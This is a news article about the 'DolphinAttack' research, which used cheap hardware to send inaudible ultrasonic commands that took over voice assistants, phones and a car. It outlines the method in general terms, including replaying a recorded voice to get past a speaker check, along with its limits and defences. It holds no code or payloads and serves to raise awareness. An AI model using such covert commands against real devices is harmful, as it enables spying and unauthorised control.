Consumers love the convenience of virtual assistants such as Siri, Alexa and Cortana, but a group of researchers has discovered an easy way to compromise the software behind them by using ultrasounds that are inaudible to the human ear.
DolphinAttack Experiment Breaches Speech Recognition Software
Six scientists from Zhejiang University in China posted a video that showed how these inaudible voice commands can occur. The researchers dubbed their experiment the “DolphinAttack” because of the way dolphins seem to communicate without making noises. By using simple off-the-shelf hardware that costs only $3, they were able to breach speech recognition software from Apple, Google, Amazon and others. Turning voice commands into ultrasound frequencies allowed them to take over smartphones, speakers and even a smart car model from Audi.
Although most of what the researchers did was fairly innocuous, such as launching music or video calling applications, malicious actors could turn to DolphinAttacks for far more nefarious purposes, Bleeping Computer pointed out. Speech recognition software could be used to spy on device users, force their browser toward malware-laden URLs or even control where a smart car moves.
As security expert Tavish Vaidya told New Scientist, security is such an issue because voice assistants are capable of much more nowadays than setting an alarm or playing music. The DolphinAttack technique has emerged at a time when speech recognition software is available in a wide variety of applications designed with convenience in mind. Besides looking up information online, for example, many people can now use tools such as Google Now or Siri to manage digital accounts for payments and other transactions.
Attack Limitations and Remaining Threats
Fortunately, there are some limitations to a DolphinAttack. Would-be threat actors would have to be only a few feet away from a device, and the attack might not work if the surrounding environment is very loud, The Verge reported. While the audio equipment used to break into the speech recognition software was cheap, it might need to be customized for a specific device based on the ideal frequencies a particular microphone might pick up. Of course, savvy consumers could also notice the attacks and might need to confirm a command or unlock their device before anything bad could happen.
Still, the researchers were even able to demonstrate how recording a potential victim’s voice could be used to override controls on speech recognition software, such as Siri, that is tailored to a specific user. The Hacker News suggested the best way to prevent a DolphinAttack is to turn off voice commands or wait for vendors to ensure ultrasounds can’t be turned against their customers.